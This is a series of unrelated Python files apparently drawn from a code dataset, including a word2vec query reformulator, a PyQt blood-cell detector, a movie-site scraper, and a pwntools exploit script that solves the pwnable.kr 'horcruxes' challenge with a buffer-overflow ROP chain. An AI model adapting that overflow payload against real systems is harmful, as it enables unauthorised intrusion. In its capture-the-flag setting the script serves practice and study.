        base = os.path.join(path, base_name)\n        self.model.save(fname_or_handle=base + INDEX_EXT)\n        with open(base + CLASSES_EXT, 'wb') as fp:\n            pickle.dump(self.storage, fp)\n        with open(base + INFO_EXT, 'wb') as fp:\n            pickle.dump(info, fp)\n\n    def load(self, path, base_name):\n        \"\"\"\n        Loads the model to the memory\n        :param path: base folder path\n        :param base_name: name of the file, extensions are connected automatically\n        :return:\n        \"\"\"\n        info = None\n        base = os.path.join(path, base_name)\n        self.model = Word2Vec.load(fname=base + INDEX_EXT)\n        # self.model.init_sims(True)\n        with open(base + CLASSES_EXT, 'rb') as fp:\n            self.storage = pickle.load(fp)\n        if os.path.exists(base + INFO_EXT):\n            with open(base + INFO_EXT, 'rb') as fp:\n                info = pickle.load(fp)\n        return info\n\n    def reformulate(self, sentence, num_res=NUM_RESULTS, public_only=False,\n                    num_candidates=NUM_CANDIDATES):\n        \"\"\"\n        Takes the sentence, cleans it and reformulates\n        :param sentence: list of words\n        :param num_res: number of output terms\n        :param public_only: use only public API methods\n        :param num_candidates: number of candidate terms for further filtration\n        :return: list of reformulated terms\n        \"\"\"\n        if not hasattr(self, \"model\"):\n            logging.warning(\"No trained model\")\n            return []\n\n        sentence = [s for s in sentence if s in self.model]\n        logging.info(\n            \"Terms of the normalized query that are present in the corpus: %s\" % ' '.join(sentence))\n\n        if not sentence:\n            return []\n\n        # TODO pre-compute class_similarity\n        storage = self.storage\n        if public_only:\n            storage = self._public_storage()\n        res = {}\n        for w in storage:\n            if w in self.model:\n                res[w] = self.model.n_similarity(sentence, [w])\n\n        sorted_candidates = sorted(res.items(), key=operator.itemgetter(1), reverse=True)\n\n        candidate_names_counts = [(k, storage[k].count) for (k, v) in\n                                  sorted_candidates[:num_candidates]]\n\n        sorted_candidate_names_counts = sorted(candidate_names_counts, key=operator.itemgetter(1),\n                                               reverse=True)\n        logging.info(\"Candidates: %s\" % ' '.join([k for (k, v) in sorted_candidate_names_counts]))\n        return [storage[k].name for (k, v) in sorted_candidate_names_counts[:num_res]]\n\n    def normalize_and_reformulate(self, query, all_asts=False):\n        \"\"\"\n        Normalizes and reformulates raw query\n        :param query: input string\n        :return: list of ASTs as reformulation\n        \"\"\"\n        normalizer = Normalizer()\n        normalized_query = normalizer.process_query(query)\n        logging.info(\"Normalized query: %s\" % ' '.join(normalized_query))\n        res = self.reformulate(normalized_query, public_only=not all_asts)\n        return res\n\n    def _public_storage(self):\n        return {k: self.storage[k] for k in self.storage if self.storage[k].publicapi}\n","sub_path":"reform/processing/vectorize.py","file_name":"vectorize.py","file_ext":"py","file_size_in_byte":4263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"486716729","text":"#coding=utf-8\nfrom pwn import *\ncontext.log_level = 'debug'\nr = ssh(host='pwnable.kr', user='horcruxes', password='guest', port=2222)\nc = r.connect_remote('localhost', 9032)\n\n# ROP chain\n\nA = 0x809fe4b\nB = 0x809fe6a\nC = 0x809fe89\nD = 0x809fea8\nE = 0x809fec7\nF = 0x809fee6\nG = 0x809ff05\nropme = 0x809fffc # note: this can only be 0x809fffc, the address of the `call ropme` inside main, because none of ropme's own addresses may be used as a return target\nc.recvuntil(\"Select Menu:\")\nc.sendline('1')\nc.recvuntil(' : ')\nshellcode=''\n
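# Stack layout sketch implied by the offsets used below (local buffer `s` at
# ebp-0x74, saved ebp at ebp, return address at ebp+4):
#   [ 'A' * 0x78 ][ ret -> A ][ B ][ C ][ D ][ E ][ F ][ G ][ ropme ]
# Each gadget returns into the next address, and the final return re-enters ropme.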
# pad with 0x78 'A's: s sits at ebp-0x74 and the return address at ebp+4, so 0x74+4 = 0x78 filler bytes are needed\nshellcode+='A'*0x78+p32(A)+p32(B)+p32(C)+p32(D)+p32(E)+p32(F)+p32(G)+p32(ropme)\nc.sendline(shellcode)\nc.recvline()\nsum = 0\nfor i in range(7):\n    s = c.recvline()\n    n = int(s.strip('\\n').split('+')[1][:-1])\n    sum += n\nc.recvuntil('Menu:')\nc.sendline('1')\nc.recvuntil(' : ')\nc.sendline(str(sum))\nc.recv()\n","sub_path":"kr_pwnable/21_horcruxes/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"331790679","text":"#! python3\n# sandwichMaker.py -> prompts user for their sandwich preferences\n\nimport pyinputplus as pypi\n\nprices = {\"wheat\": 1.00, 'white': 0.50, 'sourdough': 0.75,\n          \"chicken\": 2.50, \"turkey\": 2.25, \"ham\": 2.00, \"tofu\": 1.50,\n          \"cheddar\": 0.75, \"swiss\": 0.85, \"mozzarella\": 1.00,\n          \"condiments\": 1.00\n          }\n\nnumSandwich = pypi.inputInt('How many sandwiches would you like? \\n', greaterThan=1)\ntotPrice = 0\n\nfor i in range(1, numSandwich+1):\n    print('Please enter your preferences for Sandwich #{}:'.format(i))\n    bread = pypi.inputMenu(['wheat', 'white', 'sourdough'])\n    protein = pypi.inputMenu(['chicken', 'turkey', 'ham', 'tofu'])\n    _cheese = pypi.inputYesNo(\"Would you like cheese?\\n\")\n    if _cheese.lower() == 'yes':\n        cheese = pypi.inputMenu(['cheddar', 'swiss', 'mozzarella'])\n        condiments = pypi.inputYesNo(\"Would you like mayo, mustard, lettuce or tomato?\\n\")\n        if condiments.lower() == 'yes':\n            condiments = \"condiments\"\n            print(\"Total price of Sandwich #{} is ${}\\n\".format(i, round(prices[bread] + prices[protein] + prices[cheese] + prices[condiments], 2)))\n            totPrice += prices[bread] + prices[protein] + prices[cheese] + prices[condiments]\n        else:\n            print(\"Total price of Sandwich #{} is ${}\\n\".format(i, round(prices[bread] + prices[protein] + prices[cheese], 2)))\n            totPrice += prices[bread] + prices[protein] + prices[cheese]\n    else:\n        condiments = pypi.inputYesNo(\"Would you like mayo, mustard, lettuce or tomato?\\n\")\n        if condiments.lower() == 'yes':\n            condiments = \"condiments\"\n            print(\"Total price of Sandwich #{} is ${}\\n\".format(i, round(prices[bread] + prices[protein] + prices[condiments], 2)))\n            totPrice += prices[bread] + prices[protein] + prices[condiments]\n        else:\n            print(\"Total price of Sandwich #{} is ${}\\n\".format(i, round(prices[bread] + prices[protein], 2)))\n            totPrice += prices[bread] + prices[protein]\n\nprint(\"Your total is ${} for the {} sandwiches\".format(round(totPrice, 2), numSandwich))\n","sub_path":"input_validation/sandwichMaker.py","file_name":"sandwichMaker.py","file_ext":"py","file_size_in_byte":2113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"305665067","text":"# import helper\n# from helper import is_apple_in, name, say\n# from jinjohn.helper import is_apple_in, name, say\nimport jinjohn\n\na = 20\nb = 20\nc = [1,2,3]\nd = (1,2,3)\n\nprint(a,b,c,d)\n\nif a == 10:\n    print(\"a is 10\")\nelif a == 20 and b ==20:\n    print(\"a is 20\")\nelif a == 30:\n    print(\"a is 30\")\nelse:\n    print(\"a is nothing\")\n\nfruits = [\"Orange\", \"Apple\", \"Pineapple\"]\nfor fruit in fruits:\n    if fruit == \"Apple\":\n        print(\"Yes, I like it\")\n\n# print(helper.is_apple_in(fruits))\n# print(helper.name)\n# print(helper.say())\n\n# print(is_apple_in(fruits))\n# print(name)\n
# print(say())\n\nprint(jinjohn.helper.is_apple_in(fruits))","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"146890096","text":"import sys  # used by QApplication(sys.argv) and sys.exit() below\r\nfrom PyQt5.QtWidgets import QDialog\r\nfrom PyQt5.uic import loadUi\r\nfrom PyQt5.QtWidgets import QApplication, QFileDialog, QMessageBox\r\nfrom tkinter import *\r\nfrom PyQt5 import QtCore, QtGui\r\nfrom PyQt5.QtGui import *\r\nimport cv2 as cv\r\n\r\nname_cascade_built = \"cascade1.xml\"\r\n\r\n\r\nclass ChangeCascade(QDialog):\r\n    def __init__(self):\r\n        super(ChangeCascade, self).__init__()\r\n        loadUi('GuiChangeCascade.ui', self)\r\n\r\n\r\nclass MainWindow(QDialog):\r\n    def __init__(self):\r\n        super(MainWindow, self).__init__()\r\n        self.w = ChangeCascade()\r\n        loadUi('GuiMainWindow.ui', self)\r\n\r\n        self.uploadImage.clicked.connect(self.browse_folder)\r\n        self.changeCascade.clicked.connect(self.open_change_cascade)\r\n\r\n    def browse_folder(self):\r\n        name_cascade = name_cascade_built\r\n        options = QFileDialog.Options()\r\n        options |= QFileDialog.DontUseNativeDialog\r\n        filename, _ = QFileDialog.getOpenFileName(self, \"Open File\", \"\",\r\n                                                  \"Images (*.png *.jpg)\", options=options)\r\n        if filename:\r\n            self.load_image(filename)\r\n            self.erythrocytes.clicked.connect(lambda: self.cv_cascade(self, filename, \"erythrocyte\", name_cascade))\r\n            self.thrombocytes.clicked.connect(lambda: self.cv_cascade(self, filename, \"thrombocyte\", name_cascade))\r\n            self.monocytes.clicked.connect(lambda: self.cv_cascade(self, filename, \"monocyte\", name_cascade))\r\n            self.lymphocytes.clicked.connect(lambda: self.cv_cascade(self, filename, \"lymphocyte\", name_cascade))\r\n            self.neutrophils.clicked.connect(lambda: self.cv_cascade(self, filename, \"neutrophil\", name_cascade))\r\n        else:\r\n            print('Invalid Image')\r\n        return filename\r\n\r\n    def load_image(self, filename):\r\n        pimp = QPixmap(filename)\r\n        width = pimp.width()\r\n        height = pimp.height()\r\n\r\n        while height >= 800:\r\n            height = height - 1\r\n\r\n        while width >= 800:\r\n            width = width - 1\r\n\r\n        self.imageLabel.resize(width, height)\r\n        pimp2 = QtGui.QImage(pimp).scaled(width, height, QtCore.Qt.KeepAspectRatio)\r\n        self.imageLabel.setPixmap(QPixmap(pimp2))\r\n        self.imageLabel.setAlignment(QtCore.Qt.AlignHorizontal_Mask)\r\n        return pimp2\r\n\r\n    @staticmethod\r\n    def cv_cascade(self, pic, text, cascade):\r\n        blood_cascade = cv.CascadeClassifier(cascade)\r\n        pic = str(pic)\r\n        image = cv.imread(pic, 0)\r\n        object_blood = blood_cascade.detectMultiScale(image, 1.3, 5)\r\n\r\n        for (x, y, w, h) in object_blood:\r\n            cv.rectangle(image, (x, y), (x + w, y + h), (0, 255, 0), 2)\r\n            cv.putText(image, text, (x + w, y + h), cv.FONT_HERSHEY_DUPLEX, 0.5, (0, 255, 0), 1, cv.LINE_AA)\r\n        cv.putText(image, \"Number of \" + text + \"s\" + \" detected: \" + str(object_blood.shape[0]),\r\n                   (0, image.shape[0] - 10),\r\n                   cv.FONT_HERSHEY_DUPLEX, 1, (0, 0, 0), 1)\r\n        self.imageLabel2.setPixmap(QPixmap(cv.imshow('img', image)))\r\n\r\n    def open_change_cascade(self):\r\n        self.w.show()\r\n\r\n\r\nif __name__ == '__main__':\r\n    app = QApplication(sys.argv)\r\n    window = MainWindow()\r\n    window.setWindowTitle('Segmentation')\r\n    window.show()\r\n    sys.exit(app.exec())\r\n","sub_path":"Python_Code/PyCharm_002/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"228824847","text":"
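# Scraper for icefilms.info: walks the a-z listing pages and builds the Movie,
# TV_Show, Episode and Source containers imported below.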
from lxml import html\nimport re\nimport requests\n\nfrom containers import Movie, TV_Show, Episode, Source\n\n\nclass Scraper:\n\tdef __init__(self):\n\t\treturn\n\n\t#Find all of the sources for the requested video id (movie or tv episode)\n\tdef scrape_sources(self, video_id):\n\t\ttree = self.get_tree_from_URL(\"http://www.icefilms.info/membersonly/components/com_iceplayer/video.php?vid=\"+video_id)\n\t\t\n\t\trip_divs = tree.xpath('//div[@class=\"ripdiv\"]') #Get the overall divs\n\n\t\tsources = []\n\t\tfor div in rip_divs:\n\t\t\ttemp = html.tostring(div) #Shouldn't have to do this, but couldn't find a way around\n\t\t\ttree = html.fromstring(temp)\n\n\t\t\tdefinition = tree.xpath('//b')[0].text\n\n\t\t\tsrc_ids = tree.xpath('//a/@onclick')\n\t\t\tsites = tree.xpath('//a[@onclick]/span/text()[1]')\n\n\t\t\ti = 0\n\t\t\tfor src_id in src_ids:\n\t\t\t\tsources.append(Source(src_id[3:-1], sites[i], definition, video_id))\n\t\t\t\ti += 1\n\n\t\treturn sources\n\n\tdef scrape_movie(self, movie_id):\n\t\ttree = self.get_tree_from_URL(\"http://www.icefilms.info/ip.php?v=\"+movie_id)\n\n\t\ttitle = tree.xpath('//*[@id=\"videotitle\"]/b/span[text()]')\n\t\ttitle = title.pop()\n\n\t\ttitle = title.text.encode('utf-8')\n\t\tyear = re.search('\\(\\d*\\)', title).group(0).strip('()')\n\t\ttitle = title[:-7]\n\n\t\timdb = tree.xpath('//*[@id=\"info\"]/tr[1]/td/b/text()')\n\t\timdb = imdb.pop()\n\n\t\tself.scrape_sources(movie_id)\n\n\tdef scrape_movies(self, letter):\n\t\ttree = self.get_tree_from_URL(\"http://www.icefilms.info/movies/a-z/\"+letter.upper())\n\n\t\tmovie_list = tree.xpath('//span[@class=\"list\"]/a[text()]')\n\n\t\tmovies = []\n\t\tfor movie in movie_list:\n\t\t\tmovie_items = movie.items()\n\t\t\tmovie_items = movie_items.pop()\n\n\t\t\ttitle = movie.text_content().encode('utf-8')\n\t\t\tyear = re.search('\\(\\d*\\)', title).group(0).strip('()')\n\t\t\ttitle = title[:-7]\n\t\t\tmovie_id = movie_items[1]\n\t\t\tmovie_id = movie_id[10:-1]\n\t\t\tmovies.append(Movie(movie_id, year, title))\n\n\t\treturn movies\n\n\tdef scrape_episodes(self, show_id):\n\t\ttree = self.get_tree_from_URL(\"http://www.icefilms.info/tv/series/\"+show_id)\n\n\t\tepisode_list = tree.xpath('//span[@class=\"list\"]/a[@href]/text()')\n\t\tlinks = tree.xpath('//span[@class=\"list\"]/a/@href')\n\n\t\tepisodes = []\n\t\tfor i in range(0, len(episode_list)):\n\t\t\tlink = links[i]\n\t\t\tnumber = episode_list[i].split()[0]\n\t\t\ttitle = episode_list[i].split()[1:]\n\t\t\ttitle = \" \".join(title)\n\t\t\tepisodes.append(Episode(link[10:-1], number, title, show_id))\n\n\t\treturn episodes\n\n\tdef scrape_tv_shows(self, letter):\n\t\ttree = self.get_tree_from_URL(\"http://www.icefilms.info/tv/a-z/\"+letter.upper())\n\n\t\ttv_show_list = tree.xpath('//span[@class=\"list\"]/a[text()]')\n\t\tepisodes = tree.xpath('//span[@class=\"list\"]/a[text()]/following-sibling::text()')\n\n\t\ttv_shows = []\n\t\ti = 0\n\t\tfor tv_show in tv_show_list:\n\t\t\ttv_show_items = tv_show.items()\n\t\t\ttv_show_items = tv_show_items.pop()\n\n\t\t\ttitle = tv_show.text_content().encode('utf-8')\n\t\t\t#year = re.search('\\(\\d*\\)', title).group(0).strip('()')\n\t\t\t#year = year.strip()\n\t\t\tyear = \"????\"\n\t\t\ttitle = title[:-7].strip()\n\t\t\tshow_id = tv_show_items[1]\n\t\t\tshow_id = show_id[11:].strip()\n\t\t\tnum_episodes = episodes[i]\n\t\t\tnum_episodes = num_episodes[:-8].strip()\n\t\t\ti = i+1\n\t\t\ttv_shows.append(TV_Show(show_id, year, num_episodes, title))\n\n\t\treturn tv_shows\n\n\tdef get_tree_from_URL(self, url):\n
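		# Single shared fetch-and-parse step; every scrape_* method above funnels
		# its HTTP traffic through here.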
\t\tpage = requests.get(url)\n\t\treturn html.fromstring(page.text)\n\n\t#Search helpers: map a title to its first-letter index page, then keep substring matches\n\tdef find_tv_show(self, title):\n\t\tquery = title[0]\n\t\tif title.startswith(\"the \"):\n\t\t\tquery = title[4]\n\n\t\tquery_results = self.scrape_tv_shows(query)\n\t\thits = []\n\t\tfor result in query_results:\n\t\t\tif title in result.title.lower():\n\t\t\t\thits.append(result)\n\n\t\treturn hits\n\n\tdef find_movie(self, title):\n\t\tquery = title[0]\n\t\tif title.startswith(\"the \"):\n\t\t\tquery = title[4]\n\n\t\tquery_results = self.scrape_movies(query)\n\t\thits = []\n\t\tfor result in query_results:\n\t\t\tif title in result.title.lower():\n\t\t\t\thits.append(result)\n\n\t\treturn hits\n","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":3839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"463921514","text":"#IMPORTING LIBRARIES\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom scipy.io import loadmat\nfrom sklearn.svm import SVC\n\n#LOADING DATA\nmat=loadmat(\"ex6data2.mat\")\nX=mat[\"X\"]\ny=mat[\"y\"]\n\n#PLOTTING DATA\nm,n = X.shape[0],X.shape[1]\npos,neg = (y==1).reshape(m,1),(y==0).reshape(m,1)\nplt.scatter(X[pos[:,0],0],X[pos[:,0],1],c=\"r\",marker=\"+\",s=50)\nplt.scatter(X[neg[:,0],0],X[neg[:,0],1],c=\"b\",marker=\"o\",s=50)\nplt.xlim(0,1)\nplt.ylim(0.4,1)\nplt.show()\n\n#PLOTTING DECISION BOUNDARY\nclassifier=SVC(kernel=\"rbf\",gamma=30)\nclassifier.fit(X,y.ravel())\nplt.figure(figsize=(8,6))\nplt.scatter(X[pos[:,0],0],X[pos[:,0],1],c=\"r\",marker=\"+\")\nplt.scatter(X[neg[:,0],0],X[neg[:,0],1],c=\"b\",marker=\"o\")\nX_1,X_2 = np.meshgrid(np.linspace(X[:,0].min(),X[:,0].max(),num=100),np.linspace(X[:,1].min(),X[:,1].max(),num=100))\nplt.contour(X_1,X_2,classifier.predict(np.array([X_1.ravel(),X_2.ravel()]).T).reshape(X_1.shape),1,colors=\"g\")\nplt.xlim(0,1)\nplt.ylim(0.4,1)\nplt.show()\n","sub_path":"SVM2.py","file_name":"SVM2.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"230089796","text":"\"\"\"\nEgg drop puzzle: minimum number of trials needed in the worst case.\n\"\"\"\n\nimport sys\n\ndef eggDropRec(flr, eggs):\n    \n    if flr == 0 or flr == 1:\n        return flr\n    \n    if eggs == 1:\n        return flr\n    \n    \n    res = sys.maxsize\n    minval = sys.maxsize\n    for i in range(1, flr+1):\n        res = max(eggDropRec(i - 1, eggs - 1), eggDropRec(flr - i, eggs))\n
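        # Worst case of the two outcomes when dropping from floor i:
        #   egg breaks   -> eggDropRec(i - 1, eggs - 1)  (floors below i, one egg fewer)
        #   egg survives -> eggDropRec(flr - i, eggs)    (floors above i, same eggs)
        # The +1 on the return below counts the drop itself.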
        minval = min(res, minval)\n    \n    return minval+1\n\nif __name__ == \"__main__\":\n    eggs = 2\n    flr = 10\n    print(eggDropRec(flr, eggs))\n    \n    \n    ","sub_path":"Dynamic Programming/eggDrop.py","file_name":"eggDrop.py","file_ext":"py","file_size_in_byte":585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"12631436","text":"from pattern.circuit import Control\nimport re\n\nclass entry(Control):\n\n    MULTIPART = re.compile('Content-Disposition: form-data; name=\"(.*)\"\\r\\n([^\\0]*)', re.MULTILINE)\n\n    def incoming(self, event):\n        ct = event.trail.headers[\"content-type\"]\n        cl = int(event.trail.headers[\"content-length\"])\n        request = event.trail.rfile.read(cl)\n        bridge = self.acquireInterface(event, \"request\")\n        if bridge is not None:\n            if ct.startswith(\"multipart/form-data\"):\n                self.multipart(request, bridge)\n            else:\n                self.singlepart(request, bridge)\n        # Send OK\n        bridge = self.acquireInterface(event, \"page\")\n        if bridge is not None:\n            bridge.push()\n        else:\n            self._sendOK(event)\n    \n    def _sendOK(self, event):\n        page = \"OK\"\n        event.trail.send_response(200)\n        event.trail.send_header(\"Content-type\", \"text/plain\")\n        event.trail.send_header(\"Content-Length\", str(len(page)))\n        event.trail.end_headers()\n        event.trail.wfile.write(page)\n    \n    def multipart(self, request, bridge):\n        delimiter = request.split(\"\\r\\n\",1)[0] #@@@\n        for part in request.split(delimiter):\n            mo = self.MULTIPART.match(part.strip())\n            if mo:\n                name = mo.group(1)\n                value = mo.group(2)\n                bridge.push(name + \"=\" + value)\n    \n    def singlepart(self, request, bridge):\n        bridge.push(request)\n","sub_path":"tmp/http_parserequest.py","file_name":"http_parserequest.py","file_ext":"py","file_size_in_byte":1505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"604369097","text":"\nimport pytz\nimport datetime\nfrom pytz import timezone\nutc = pytz.utc\ntzinfo = timezone('Europe/Berlin')\n\ndef parse_date(s, tzinfo = utc):\n    \"\"\"parse dates like 20121219T160000Z\"\"\"\n    year = int(s[0:4])\n    month = int(s[4:6])\n    day = int(s[6:8])\n    hour = int(s[9:11])\n    minute = int(s[11:13])\n    second = int(s[13:15])\n    return datetime.datetime(year, month, day, hour, minute, second, 0, tzinfo)\n","sub_path":"pyallris/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"461230918","text":"from __future__ import unicode_literals\nimport functools\nimport io\nimport locale\nimport os\nimport random\nimport shutil\nimport string\nimport subprocess\nimport sys\nimport tempfile\nfrom pkg_resources import get_distribution\n\nfrom dallinger.config import get_config\n\n\ndef get_base_url():\n    config = get_config()\n    host = os.getenv(\"HOST\", config.get(\"host\"))\n    if \"herokuapp.com\" in host:\n        if host.startswith(\"https://\"):\n            base_url = host\n        elif host.startswith(\"http://\"):\n            base_url = host.replace(\"http://\", \"https://\")\n        else:\n            base_url = \"https://{}\".format(host)\n    else:\n        # debug mode\n        base_port = config.get(\"base_port\")\n        port = random.randrange(base_port, base_port + config.get(\"num_dynos_web\"))\n        base_url = \"http://{}:{}\".format(host, port)\n\n    return base_url\n\n\ndef dallinger_package_path():\n    \"\"\"Return the absolute path of the root directory of the installed\n    Dallinger package:\n\n    >>> utils.dallinger_package_path()\n 
'/Users/janedoe/projects/Dallinger3/dallinger'\n \"\"\"\n dist = get_distribution(\"dallinger\")\n src_base = os.path.join(dist.location, dist.project_name)\n\n return src_base\n\n\ndef generate_random_id(size=6, chars=string.ascii_uppercase + string.digits):\n \"\"\"Generate random id numbers.\"\"\"\n return \"\".join(random.choice(chars) for x in range(size))\n\n\ndef ensure_directory(path):\n \"\"\"Create a matching path if it does not already exist\"\"\"\n if not os.path.exists(path):\n os.makedirs(path)\n\n\ndef run_command(cmd, out, ignore_errors=False):\n \"\"\"We want to both send subprocess output to stdout or another file\n descriptor as the subprocess runs, *and* capture the actual exception\n message on errors. CalledProcessErrors do not reliably contain the\n underlying exception in either the 'message' or 'out' attributes, so\n we tee the stderr to a temporary file and if a CalledProcessError is\n raised we read its contents to recover stderr\n \"\"\"\n tempdir = tempfile.mkdtemp()\n output_file = os.path.join(tempdir, \"stderr\")\n original_cmd = \" \".join(cmd)\n p = subprocess.Popen(cmd, stdout=out, stderr=subprocess.PIPE)\n t = subprocess.Popen([\"tee\", output_file], stdin=p.stderr, stdout=out)\n t.wait()\n p.communicate()\n p.stderr.close()\n if p.returncode != 0 and not ignore_errors:\n with open(output_file, \"r\") as output:\n error = output.read()\n message = 'Command: \"{}\": Error: \"{}\"'.format(\n original_cmd, error.replace(\"\\n\", \"\")\n )\n shutil.rmtree(tempdir, ignore_errors=True)\n raise CommandError(message)\n\n shutil.rmtree(tempdir, ignore_errors=True)\n return p.returncode\n\n\nclass CommandError(Exception):\n \"\"\"Something went wrong executing a subprocess command\"\"\"\n\n\nclass GitError(Exception):\n \"\"\"Something went wrong calling a Git command\"\"\"\n\n\nclass GitClient(object):\n \"\"\"Minimal wrapper, mostly for mocking\"\"\"\n\n def __init__(self, output=None):\n self.encoding = None\n if output is None:\n self.out = sys.stdout\n else:\n self.out = output\n\n def init(self, config=None):\n self._run([\"git\", \"init\"])\n if config is not None:\n for k, v in config.items():\n self._run([\"git\", \"config\", k, v])\n\n def add(self, what):\n self._run([\"git\", \"add\", what])\n\n def commit(self, msg):\n self._run([\"git\", \"commit\", \"-m\", '\"{}\"'.format(msg)])\n\n def push(self, remote, branch):\n cmd = [\"git\", \"push\", remote, branch]\n self._run(cmd)\n\n def clone(self, repository):\n tempdir = tempfile.mkdtemp()\n cmd = [\"git\", \"clone\", repository, tempdir]\n self._run(cmd)\n return tempdir\n\n def files(self):\n cmd = [\"git\", \"ls-files\", \"-z\", \"--cached\", \"--others\", \"--exclude-standard\"]\n try:\n raw = check_output(cmd).decode(locale.getpreferredencoding())\n except Exception:\n return set()\n\n result = {item for item in raw.split(\"\\0\") if item}\n return result\n\n def _run(self, cmd):\n self._log(cmd)\n try:\n run_command(cmd, self.out)\n except CommandError as e:\n raise GitError(str(e))\n\n def _log(self, cmd):\n msg = '{}: \"{}\"'.format(self.__class__.__name__, \" \".join(cmd))\n if self.encoding:\n msg = msg.encode(self.encoding)\n self.out.write(msg)\n\n\nclass ParticipationTime(object):\n\n grace_period_seconds = 120\n\n def __init__(self, participant, reference_time, config):\n self.participant = participant\n self.when = reference_time\n self.allowed_hours = config.get(\"duration\")\n self.app_id = config.get(\"app_id\", \"unknown\")\n\n @property\n def assignment_id(self):\n return 
self.participant.assignment_id\n\n @property\n def allowed_minutes(self):\n return self.allowed_hours * 60\n\n @property\n def allowed_seconds(self):\n return self.allowed_hours * 60.0 * 60.0\n\n @property\n def active_seconds(self):\n delta = self.when - self.participant.creation_time\n return delta.total_seconds()\n\n @property\n def active_minutes(self):\n return self.active_seconds / 60\n\n @property\n def excess_minutes(self):\n return (self.active_seconds - self.allowed_seconds) / 60\n\n @property\n def is_overdue(self):\n total_allowed_seconds = self.allowed_seconds + self.grace_period_seconds\n return self.active_seconds > total_allowed_seconds\n\n\ndef wrap_subprocess_call(func, wrap_stdout=True):\n @functools.wraps(func)\n def wrapper(*popenargs, **kwargs):\n out = kwargs.get(\"stdout\", None)\n err = kwargs.get(\"stderr\", None)\n replay_out = False\n replay_err = False\n if out is None and wrap_stdout:\n try:\n sys.stdout.fileno()\n except io.UnsupportedOperation:\n kwargs[\"stdout\"] = tempfile.NamedTemporaryFile()\n replay_out = True\n if err is None:\n try:\n sys.stderr.fileno()\n except io.UnsupportedOperation:\n kwargs[\"stderr\"] = tempfile.NamedTemporaryFile()\n replay_err = True\n try:\n return func(*popenargs, **kwargs)\n finally:\n if replay_out:\n kwargs[\"stdout\"].seek(0)\n sys.stdout.write(kwargs[\"stdout\"].read())\n if replay_err:\n kwargs[\"stderr\"].seek(0)\n sys.stderr.write(kwargs[\"stderr\"].read())\n\n return wrapper\n\n\ncheck_call = wrap_subprocess_call(subprocess.check_call)\ncall = wrap_subprocess_call(subprocess.call)\ncheck_output = wrap_subprocess_call(subprocess.check_output, wrap_stdout=False)\n","sub_path":"dallinger/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"444257753","text":"f = open (\"scores.txt\", \"r\")\r\n\r\nusers = {}\r\n\r\nfor line in f:\r\n entry = line.strip().split(\",\")\r\n user = entry[0]\r\n score = entry[1]\r\n users[user] = score\r\n print(user + \": \" + score)\r\n\r\n\t\r\nf.close()\r\n\r\nprint(users)\r\n\r\n ","sub_path":"reading.py","file_name":"reading.py","file_ext":"py","file_size_in_byte":237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"594870001","text":"from app import apfell, dbloop, apfell_db, db_objects, use_ssl, listen_port, listen_ip, ssl_cert_path, ssl_key_path\r\nimport asyncio\r\nimport ssl\r\n\r\nif __name__ == \"__main__\":\r\n asyncio.set_event_loop(dbloop)\r\n if use_ssl:\r\n context = ssl.create_default_context(purpose=ssl.Purpose.CLIENT_AUTH)\r\n context.load_cert_chain(ssl_cert_path, keyfile=ssl_key_path)\r\n server = apfell.create_server(host=listen_ip, port=listen_port, ssl=context)\r\n else:\r\n server = apfell.create_server(host=listen_ip, port=listen_port)\r\n loop = asyncio.get_event_loop()\r\n task = asyncio.ensure_future(server)\r\n db_objects.database.allow_sync = True # raise AssertionError on ANY sync call, needs to be worked out though\r\n try:\r\n loop.run_until_complete(apfell_db.connect_async(loop=dbloop))\r\n loop.run_forever()\r\n except:\r\n loop.stop()\r\n\r\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"135025167","text":"import unittest\n\nfrom src.guest import Guest\nfrom src.song import Song\nfrom src.room import Room\n\n\nclass 
TestGuest(unittest.TestCase):\n\n def setUp(self):\n self.song_1 = Song(\"Ice Ice Baby\", \"Vanilla Ice\")\n self.song_2 = Song(\"Greatest Day\", \"Take That\")\n self.song_3 = Song(\"Especially for You\", \"Kylie and Jason\")\n\n self.songs = [self.song_1, self.song_2, self.song_3]\n\n song = Song(\"Ice, Ice, Baby\", \"Vanilla Ice\")\n self.guest = Guest(\"Nevan\", song)\n \n def test_guest_has_name(self):\n self.assertEqual(\"Nevan\", self.guest.name)\n \n def test_guest_has_favourite_song(self):\n self.assertEqual(\"Ice, Ice, Baby\", self.guest.favourite_song.title)\n \n \n \n","sub_path":"tests/guest_test.py","file_name":"guest_test.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"299397038","text":"from flask import request, url_for, redirect, render_template\nfrom flask import Blueprint\n\nnotes_api = Blueprint('notes_api', __name__)\n\nfrom models import Note\n\n@notes_api.route(\"/notes/create\", 